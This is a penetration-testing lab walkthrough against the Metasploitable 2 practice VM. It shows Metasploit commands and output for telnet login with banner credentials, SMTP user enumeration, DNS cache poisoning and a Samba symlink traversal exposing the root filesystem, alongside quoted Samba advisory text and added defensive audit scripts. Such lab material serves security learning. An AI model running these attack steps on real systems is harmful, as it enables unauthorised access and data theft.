Channel: Pax Pentest » Metasploit

Metasploitable 2: Port 23 Open Telnet


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
23/tcp    open  telnet      Linux telnetd

Most of the information on the Internet talks of using a password cracking tool against this Telnet service; however, there is another way, using a Metasploit scanner:

msf > search telnet
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name                                                Disclosure Date  Rank       Description
----                                                ---------------  ----       -----------
auxiliary/admin/http/dlink_dir_300_600_exec_noauth  2013-02-04       normal     D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof        2010-12-21       normal     Microsoft IIS FTP Server Encoded Response Overflow Trigger
auxiliary/scanner/telnet/lantronix_telnet_password                   normal     Lantronix Telnet Password Recovery
auxiliary/scanner/telnet/lantronix_telnet_version                    normal     Lantronix Telnet Service Banner Detection
auxiliary/scanner/telnet/telnet_encrypt_overflow                     normal     Telnet Service Encyption Key ID Overflow Detection
auxiliary/scanner/telnet/telnet_login                                normal     Telnet Login Check Scanner
auxiliary/scanner/telnet/telnet_ruggedcom                            normal     RuggedCom Telnet Password Generator
auxiliary/scanner/telnet/telnet_version                              normal     Telnet Service Banner Detection
auxiliary/server/capture/telnet                                      normal     Authentication Capture: Telnet
exploit/freebsd/ftp/proftp_telnet_iac               2010-11-01       great      ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
exploit/freebsd/telnet/telnet_encrypt_keyid         2011-12-23       great      FreeBSD Telnet Service Encryption Key ID Buffer Overflow
exploit/linux/ftp/proftp_telnet_iac                 2010-11-01       great      ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (Linux)
exploit/linux/http/dlink_diagnostic_exec_noauth     2013-03-05       excellent  D-Link DIR-645 / DIR-815 diagnostic.php Command Execution
exploit/linux/http/dlink_dir300_exec_telnet         2013-04-22       excellent  D-Link Devices Unauthenticated Remote Command Execution
exploit/linux/http/dlink_upnp_exec_noauth_telnetd   2013-07-05       excellent  D-Link Devices UPnP SOAP Telnetd Command Execution
exploit/linux/telnet/telnet_encrypt_keyid           2011-12-23       great      Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
exploit/solaris/telnet/fuser                        2007-02-12       excellent  Sun Solaris Telnet Remote Authentication Bypass Vulnerability
exploit/solaris/telnet/ttyprompt                    2002-01-18       excellent  Solaris in.telnetd TTYPROMPT Buffer Overflow
exploit/unix/webapp/dogfood_spell_exec              2009-03-03       excellent  Dogfood CRM spell.php Remote Command Execution
exploit/windows/proxy/ccproxy_telnet_ping           2004-11-11       average    CCProxy <= v6.2 Telnet Proxy Ping Overflow
exploit/windows/telnet/gamsoft_telsrv_username      2000-07-17       average    GAMSoft TelSrv 1.5 Username Buffer Overflow
exploit/windows/telnet/goodtech_telnet              2005-03-15       average    GoodTech Telnet Server <= 5.0.6 Buffer Overflow
payload/cmd/unix/reverse                                             normal     Unix Command Shell, Double reverse TCP (telnet)
payload/cmd/unix/reverse_bash_telnet_ssl                             normal     Unix Command Shell, Reverse TCP SSL (telnet)
payload/cmd/unix/reverse_ssl_double_telnet                           normal     Unix Command Shell, Double Reverse TCP SSL (telnet)
post/windows/gather/credentials/mremote                              normal     Windows Gather mRemote Saved Password Extraction

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
PASSWORD                   no        The password for the specified username
RHOSTS                     yes       The target address range or CIDR identifier
RPORT     23               yes       The target port
THREADS   1                yes       The number of concurrent threads
TIMEOUT   30               yes       Timeout for the Telnet probe
USERNAME                   no        The username to authenticate as

msf auxiliary(telnet_version) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(telnet_version) > set RPORT 23
RPORT => 23
msf auxiliary(telnet_version) > run

[*] 192.168.1.103:23 TELNET _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(telnet_version) >

If we look carefully at the Telnet banner we can see "Login with msfadmin/msfadmin", so, armed with the username and password, we can connect from the attacking Terminal:

# telnet 192.168.1.103
Trying 192.168.1.103...
Connected to 192.168.1.103.
Escape character is '^]'.
                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ 
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ 
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          

Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started

metasploitable login: msfadmin
Password:
Last login: Tue Nov  5 13:12:09 EST 2013 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

No mail.
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

msfadmin@metasploitable:~$


Metasploitable 2: Port 25 Open SMTP Postfix SMTPD


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
25/tcp    open  smtp        Postfix smtpd

Despite researching the Postfix email service, I haven't uncovered an exploit; however, we can enumerate user information via Metasploit's scanner:

msf > search postfix smtp
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name                                                    Disclosure Date  Rank       Description
----                                                    ---------------  ----       -----------
auxiliary/client/smtp/emailer                                            normal     Generic Emailer (SMTP)
auxiliary/dos/smtp/sendmail_prescan                     2003-09-17       normal     Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
auxiliary/dos/windows/smtp/ms06_019_exchange            2004-11-12       normal     MS06-019 Exchange MODPROP Heap Overflow
auxiliary/fuzzers/smtp/smtp_fuzzer                                       normal     SMTP Simple Fuzzer
auxiliary/scanner/smtp/smtp_enum                                         normal     SMTP User Enumeration Utility
auxiliary/scanner/smtp/smtp_relay                                        normal     SMTP Open Relay Detection
auxiliary/scanner/smtp/smtp_version                                      normal     SMTP Banner Grabber
auxiliary/server/capture/smtp                                            normal     Authentication Capture: SMTP
auxiliary/vsploit/pii/email_pii                                          normal     VSploit Email PII
exploit/linux/misc/gld_postfix                          2005-04-12       good       GLD (Greylisting Daemon) Postfix Buffer Overflow
exploit/linux/smtp/exim4_dovecot_exec                   2013-05-03       excellent  Exim and Dovecot Insecure Configuration Command Injection
exploit/unix/smtp/clamav_milter_blackhole               2007-08-24       excellent  ClamAV Milter Blackhole-Mode Remote Code Execution
exploit/unix/smtp/exim4_string_format                   2010-12-07       excellent  Exim4 <= 4.69 string_format Function Heap Buffer Overflow
exploit/unix/webapp/squirrelmail_pgp_plugin             2007-07-09       manual     SquirrelMail PGP Plugin command execution (SMTP)
exploit/windows/browser/communicrypt_mail_activex       2010-05-19       great      CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
exploit/windows/browser/oracle_dc_submittoexpress       2009-08-28       normal     Oracle Document Capture 10g ActiveX Control Buffer Overflow
exploit/windows/email/ms07_017_ani_loadimage_chunksize  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
exploit/windows/http/mdaemon_worldclient_form2raw       2003-12-29       great      MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
exploit/windows/smtp/mailcarrier_smtp_ehlo              2004-10-26       good       TABS MailCarrier v2.51 SMTP EHLO Overflow
exploit/windows/smtp/mercury_cram_md5                   2007-08-18       great      Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
exploit/windows/smtp/ms03_046_exchange2000_xexch50      2003-10-15       good       MS03-046 Exchange 2000 XEXCH50 Heap Overflow
exploit/windows/smtp/njstar_smtp_bof                    2011-10-31       normal     NJStar Communicator 3.00 MiniSMTP Buffer Overflow
exploit/windows/smtp/wmailserver                        2005-07-11       average    SoftiaCom WMailserver 1.0 Buffer Overflow
exploit/windows/smtp/ypops_overflow1                    2004-09-27       average    YPOPS 0.6 Buffer Overflow
exploit/windows/ssl/ms04_011_pct                        2004-04-13       average    Microsoft Private Communications Transport Overflow
post/windows/gather/credentials/outlook                                  normal     Windows Gather Microsoft Outlook Saved Password Extraction

msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

Name       Current Setting                                              Required  Description
----       ---------------                                              --------  -----------
RHOSTS                                                                  yes       The target address range or CIDR identifier
RPORT      25                                                           yes       The target port
THREADS    1                                                            yes       The number of concurrent threads
UNIXONLY   true                                                         yes       Skip Microsoft bannered servers when testing unix users
USER_FILE  /opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt  yes       The file that contains a list of probable users accounts.

msf auxiliary(smtp_enum) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103

msf auxiliary(smtp_enum) > set RPORT 25
RPORT => 25
msf auxiliary(smtp_enum) > run

[*] 192.168.1.103:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
[+] 192.168.1.103:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, users have been identified, which might be useful in further attacks, especially if any of the passwords are the same as the username.

I did connect to the Postfix email service via Telnet:

# telnet 192.168.1.103 25
Trying 192.168.1.103...
Connected to 192.168.1.103.
Escape character is '^]'.
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

I attempted to log on using the above user credentials, but was greeted with:

503 5.5.1 Error: authentication not enabled

So, presumably the Telnet connection is operational, but I simply don’t know how to take advantage of this.
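To make the two replies above concrete, here is an added example (my own code, not from the original post or from Metasploit) that models the VRFY exchange smtp_enum relies on and the 503 the author received. `fake_postfix`, `vrfy_oracle` and `auth_offered` are names I chose; the canned replies mimic Postfix's defaults and its `disable_vrfy_command = yes` setting, and the user list is a subset of the module's output.

```python
import re
import socket

# Constructed: a subset of the users smtp_enum reported on the page.
LOCAL_USERS = {"backup", "bin", "daemon", "ftp", "mail", "postgres", "www-data"}


def fake_postfix(vrfy_enabled):
    """Return a send/receive callable imitating Postfix with VRFY on or off
    (off is what 'disable_vrfy_command = yes' in main.cf produces)."""
    def exchange(command):
        verb, _, arg = command.strip().partition(" ")
        verb = verb.upper()
        if verb == "EHLO":
            # No AUTH capability line: SASL is not configured on this server.
            return "250-metasploitable.localdomain\r\n250 8BITMIME\r\n"
        if verb == "VRFY":
            if not vrfy_enabled:
                return "502 5.5.1 VRFY command is disabled\r\n"
            if arg in LOCAL_USERS:
                return "252 2.0.0 %s\r\n" % arg
            return ("550 5.1.1 <%s@metasploitable.localdomain>: Recipient address "
                    "rejected: User unknown in local recipient table\r\n" % arg)
        if verb == "AUTH":
            # The reply the author saw: no SASL mechanism is enabled at all.
            return "503 5.5.1 Error: authentication not enabled\r\n"
        if verb == "QUIT":
            return "221 2.0.0 Bye\r\n"
        return "502 5.5.2 Error: command not recognized\r\n"
    return exchange


def reply_code(reply):
    """Three-digit SMTP status at the start of a reply, or None."""
    m = re.match(r"(\d{3})", reply)
    return int(m.group(1)) if m else None


def vrfy_oracle(exchange, known_user, probe="no-such-user-9f3a"):
    """'disabled' when VRFY is refused, 'leaks' when a real and a bogus user get
    different status codes (a user-enumeration oracle), otherwise 'uniform'."""
    exchange("EHLO audit.example\r\n")
    good = reply_code(exchange("VRFY %s\r\n" % known_user))
    bad = reply_code(exchange("VRFY %s\r\n" % probe))
    exchange("QUIT\r\n")
    if good == 502 and bad == 502:
        return "disabled"
    return "leaks" if good != bad else "uniform"


def auth_offered(exchange):
    """True only if EHLO advertises AUTH and an AUTH attempt is not met with 503;
    otherwise there is nothing to log in to, whatever credentials you hold."""
    ehlo = exchange("EHLO audit.example\r\n")
    if not re.search(r"^250[- ]AUTH\b", ehlo, re.M):
        return False
    return reply_code(exchange("AUTH LOGIN\r\n")) != 503


def live_exchange(host, port=25, timeout=10):
    """Real transport with the same interface, for checking your own MTA."""
    sock = socket.create_connection((host, port), timeout=timeout)
    f = sock.makefile("rwb")
    f.readline()  # discard the 220 greeting

    def exchange(command):
        f.write(command.encode("ascii"))
        f.flush()
        lines = []
        while True:  # collect a multi-line reply up to the 'NNN ' terminator
            line = f.readline().decode("ascii", "replace")
            lines.append(line)
            if len(line) < 4 or line[3] != "-":
                return "".join(lines)
    return exchange


if __name__ == "__main__":
    for enabled in (True, False):
        print("vrfy_enabled=%s -> %s" % (enabled, vrfy_oracle(fake_postfix(enabled), "backup")))
```

Against a real host, `vrfy_oracle(live_exchange("mta.example"), "postmaster")` should return `disabled` once the main.cf fix is in place.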

Metasploitable 2: Port 53 ISC BIND 9.4.2 – Domain Name Server Cache Poisoning


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
53/tcp    open  domain      ISC BIND 9.4.2

It's worth noting at the outset that neither of the below Metasploit auxiliaries worked for me; however, as I spent so much time researching and testing and learned whilst doing so, I'm going to detail the vulnerability as you might have success with this.

The premise of this Domain Name Server vulnerability is injecting spoofed records into the server's cache, with the aim of overwriting the details of one website and linking its name to another. The consequence is that a user requests one website and a completely different website is served up.

The first exploit I tried was Metasploit's Bailiwicked_Domain auxiliary:

Description
===========

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver.  This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain.  By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache.  This insertion completely replaces the original nameserver
records for the target domain.

Example
=======

# /msf3/msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

       =[ msf v3.2-release
+ -- --=[ 298 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 73 aux

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

b.iana-servers.net.
a.iana-servers.net.

msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*]  Got an NS record: example.com.            171957  IN      NS      b.iana-servers.net.
[*]   Querying recon nameserver for address of b.iana-servers.net....
[*]    Got an A record: b.iana-servers.net.     171028  IN      A       193.0.0.236
[*]     Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*]     b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*]  Got an NS record: example.com.            171957  IN      NS      a.iana-servers.net.
[*]   Querying recon nameserver for address of a.iana-servers.net....
[*]    Got an A record: a.iana-servers.net.     171414  IN      A       192.0.34.43
[*]     Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*]     a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed

msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

dns01.metasploit.com.

It's worth noting the "check" command doesn't work anymore.

The second exploit I tried was Metasploit’s Bailiwicked_Host Auxiliary and the process is detailed in the below two videos:

Again, neither of these exploits worked for me, but hopefully you may have more success.
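An added example (my own code, not from the original post or the Metasploit module) that puts numbers on why the module's check cares about static source ports: it parses the PORT lines the check printed, and works out how many queries an attacker sending 20 spoofed replies per query should need against a 16-bit transaction ID alone versus a transaction ID plus a randomised source port. The function names and the copied check output are mine; the 16 extra bits for a randomising resolver is an assumption (roughly the ephemeral port range).

```python
import re

# Constructed copy of the lines the module's 'check' printed in the example above.
CHECK_OUTPUT = """\
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
"""


def observed_source_ports(check_output):
    """Source ports the resolver used for its outbound queries, in order."""
    return [int(p) for p in re.findall(r"PORT:\s*(\d+)", check_output)]


def uses_static_port(ports):
    """True when every observed query left from the same UDP source port,
    i.e. the port adds no entropy and only the 16-bit TXID must be guessed."""
    return len(ports) >= 2 and len(set(ports)) == 1


def expected_queries(responses_per_query, txid_bits=16, port_bits=0):
    """Expected number of resolver queries the attacker must provoke before one
    spoofed reply matches TXID (and port); each query is an independent trial."""
    space = 2 ** (txid_bits + port_bits)
    p = min(1.0, responses_per_query / space)
    return 1.0 / p


def success_probability(responses_per_query, queries, txid_bits=16, port_bits=0):
    """Chance of at least one matching spoof within the given number of queries."""
    space = 2 ** (txid_bits + port_bits)
    p = min(1.0, responses_per_query / space)
    return 1.0 - (1.0 - p) ** queries


def assess(check_output, responses_per_query=20):
    """Summarise a run: which entropy applies and the resulting work factor,
    including the odds of success by the page's 13250 attempts."""
    ports = observed_source_ports(check_output)
    static = uses_static_port(ports)
    # Assumption: a randomising resolver draws from the ~64k ephemeral ports,
    # worth about 16 extra bits per guess.
    port_bits = 0 if static else 16
    return {
        "static_source_port": static,
        "expected_queries": expected_queries(responses_per_query, port_bits=port_bits),
        "p_within_13250": success_probability(responses_per_query, 13250,
                                              port_bits=port_bits),
    }


if __name__ == "__main__":
    for key, value in assess(CHECK_OUTPUT).items():
        print("%s: %s" % (key, value))
```

With a static port the expected cost is about 3,277 queries, so the 13,250 attempts the module needed are well within reach; with a randomised port it rises to over 200 million.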

Metasploitable 2: Samba Server


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

What is Samba?

Samba is software that can be run on a platform other than Microsoft Windows, for example, UNIX, Linux, IBM System 390, OpenVMS, and other operating systems. Samba uses the TCP/IP protocol that is installed on the host server. When correctly configured, it allows that host to interact with a Microsoft Windows client or server as if it is a Windows file and print server.

SMBD is part of Samba and is the server daemon that provides filesharing and printing services to Windows clients. The server provides filespace and printer services to clients using the SMB (or CIFS) protocol.

We can use smbclient in the attacking Terminal to investigate the Samba server. When prompted for root's password simply hit Enter, which gives an anonymous login:

~# smbclient -L //192.168.1.103
Enter root's password: 
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

	Server               Comment
	---------            -------
	METASPLOITABLE       metasploitable server (Samba 3.0.20-Debian)

	Workgroup            Master
	---------            -------
	HOME                 BTHUB3
	WORKGROUP            METASPLOITABLE

We can dig down deeper into the tmp share if we wish:

:~# smbclient //192.168.1.103/tmp
Enter root's password: 
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> ls
  .                                   D        0  Tue Nov 12 07:58:34 2013
  ..                                 DR        0  Sun May 20 20:36:12 2012
  5251.jsvc_up                        R        0  Mon Nov 11 15:02:52 2013
  .ICE-unix                          DH        0  Mon Nov 11 15:01:07 2013
  .X11-unix                          DH        0  Mon Nov 11 15:01:52 2013
  .X0-lock                           HR       11  Mon Nov 11 15:01:52 2013

		56891 blocks of size 131072. 42480 blocks available
smb: \>

We can check if this is writable:

smb: \> mkdir test
smb: \> ls
  .                                   D        0  Tue Nov 12 08:00:45 2013
  ..                                 DR        0  Sun May 20 20:36:12 2012
  5251.jsvc_up                        R        0  Mon Nov 11 15:02:52 2013
  .ICE-unix                          DH        0  Mon Nov 11 15:01:07 2013
  .X11-unix                          DH        0  Mon Nov 11 15:01:52 2013
  .X0-lock                           HR       11  Mon Nov 11 15:01:52 2013
  test                                D        0  Tue Nov 12 08:00:45 2013

It is indeed writable.

Our investigations have revealed Samba version 3.0.20, and the associated vulnerability is well documented by the Samba team:

A user named “kcopedarookie” posted what they claim to be a video of a zero-day exploit in Samba on youtube yesterday.

The video shows modifications to smbclient allowing /etc/passwd to be downloaded from a remote server.

The issue is actually a default insecure configuration in Samba.

Quick FAQ: What do I do !

Set:

  wide links = no

in the [global] section of your smb.conf and restart smbd to eliminate this problem.

Longer FAQ: The real issue

The problem comes from a combination of two features in Samba, each of which on their own are useful to Administrators, but in combination allow users to access any file on the system that their logged in username has permissions to read (this is not a privilege escalation problem).

By default Samba ships with the parameter “wide links = yes”, which allows Administrators to locally (on the server) add a symbolic link inside an exported share which SMB/CIFS clients will follow.

As an example, given a share definition:

  [tmp]
      path = /tmp
      read only = no
      guest ok = yes

The administrator could add a symlink:

  $ ln -s /etc/passwd /tmp/passwd

and SMB/CIFS clients would then see a file called “passwd” within the [tmp] share that could be read and would allow clients to read /etc/passwd.

If the “wide links” parameter is set to “no”, any attempt to read this file will fail with an “access denied” error.

The problem occurs as Samba allows clients using the UNIX extensions (which are also turned on by default) to create symlinks on remotely mounted shares on which they have write access that point to any path on the file system.

This is by design, as applications running on UNIX clients may have good reasons to create symlinks anywhere on the filesystem they have write access that point to local files (such as /etc/passwd).

UNIX clients will resolve these links locally, but Windows clients will resolve them on the server. It is this combination that causes the problem.

All future versions of Samba will have the parameter “wide links” set to “no” by default, and the manual pages will be updated to explain this issue.
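To turn the advisory's conditions into something checkable, here is an added smb.conf audit (my own code, not Samba's or the original post's) that reads a config, applies the pre-fix 3.0.x defaults the advisory describes (wide links and unix extensions both on) and flags writeable shares on which a client-created symlink would be followed by the server. The two config fragments are constructed around the advisory's [tmp] share, and the parser is intentionally minimal.

```python
# Constructed configs: the advisory's [tmp] share as shipped, and the same
# file with the advisory's fix ('wide links = no' in [global]) applied.
WEAK_CONF = """\
[global]
    workgroup = WORKGROUP
    ; nothing about wide links or unix extensions: both default to yes here

[tmp]
    path = /tmp
    read only = no
    guest ok = yes
"""

FIXED_CONF = WEAK_CONF.replace("workgroup = WORKGROUP",
                               "workgroup = WORKGROUP\n    wide links = no")

# Assumption: compiled-in defaults of a Samba 3.0.x build, as the advisory states.
DEFAULTS = {"wide links": "yes", "unix extensions": "yes",
            "read only": "yes", "guest ok": "no"}


def parse_smb_conf(text):
    """Minimal smb.conf reader: '[section]' headers and 'key = value' lines,
    with keys lower-cased and inner whitespace squeezed as Samba treats them."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep and current is not None:
            sections[current][" ".join(key.split()).lower()] = value.strip()
    return sections


def truthy(value):
    return value.lower() in ("yes", "true", "1")


def effective(sections, share, key):
    """Share-level value, else the [global] value, else the compiled-in default."""
    return (sections.get(share, {}).get(key)
            or sections.get("global", {}).get(key)
            or DEFAULTS[key])


def is_writeable(sections, share):
    """'writeable'/'writable'/'write ok' are Samba synonyms for the inverse of 'read only'."""
    for synonym in ("writeable", "writable", "write ok"):
        value = sections.get(share, {}).get(synonym)
        if value is not None:
            return truthy(value)
    return not truthy(effective(sections, share, "read only"))


def audit(text):
    """Findings for the advisory's condition: unix extensions let a client plant
    a symlink on a writeable share, and wide links make smbd follow it."""
    s = parse_smb_conf(text)
    findings = []
    unix_ext = truthy(effective(s, "global", "unix extensions"))  # global-only option
    for share in s:
        if share == "global":
            continue
        wide = truthy(effective(s, share, "wide links"))  # per-share, inherits global
        if wide and unix_ext and is_writeable(s, share):
            who = ("anonymous clients" if truthy(effective(s, share, "guest ok"))
                   else "authenticated clients")
            findings.append(
                "share [%s]: writeable, wide links = yes, unix extensions = yes; "
                "%s can create symlinks that escape the share "
                "(fix: 'wide links = no' in [global])" % (share, who))
    return findings


if __name__ == "__main__":
    print(audit(WEAK_CONF) or ["no findings"])
    print(audit(FIXED_CONF) or ["no findings"])
```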

OK, to the Metasploit exploit: this Samba version ships with wide links and UNIX extensions both enabled, so a client can create symbolic links pointing anywhere on the filesystem and the server will follow them, and we use Metasploit's samba_symlink_traversal auxiliary:

msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOST                       yes       The target address
RPORT      445              yes       Set the SMB service port
SMBSHARE                    yes       The name of a writeable share on the server
SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf auxiliary(samba_symlink_traversal) > set smbshare tmp
smbshare => tmp
msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server...
[*] Trying to mount writeable share 'tmp'...
[*] Trying to link 'rootfs' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.1.103\tmp\rootfs\

[*] Auxiliary module execution completed

If we now return to smbclient, the rootfs folder serves up access to the whole of the disk's contents:

:~# smbclient //192.168.1.103/tmp
Enter root's password: 
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> ls
  .                                   D        0  Tue Nov 12 08:35:42 2013
  ..                                 DR        0  Sun May 20 20:36:12 2012
  5251.jsvc_up                        R        0  Mon Nov 11 15:02:52 2013
  .ICE-unix                          DH        0  Mon Nov 11 15:01:07 2013
  .X11-unix                          DH        0  Mon Nov 11 15:01:52 2013
  .X0-lock                           HR       11  Mon Nov 11 15:01:52 2013
  rootfs                             DR        0  Sun May 20 20:36:12 2012
  test                                D        0  Tue Nov 12 08:00:45 2013

		56891 blocks of size 131072. 42480 blocks available
smb: \> cd rootfs
smb: \rootfs\> ls
  .                                  DR        0  Sun May 20 20:36:12 2012
  ..                                 DR        0  Sun May 20 20:36:12 2012
  initrd                             DR        0  Tue Mar 16 23:57:40 2010
  media                              DR        0  Tue Mar 16 23:55:52 2010
  bin                                DR        0  Mon May 14 05:35:33 2012
  lost+found                         DR        0  Tue Mar 16 23:55:15 2010
  mnt                                DR        0  Wed Apr 28 22:16:56 2010
  sbin                               DR        0  Mon May 14 03:54:53 2012
  initrd.img                          R  7929183  Mon May 14 05:35:56 2012
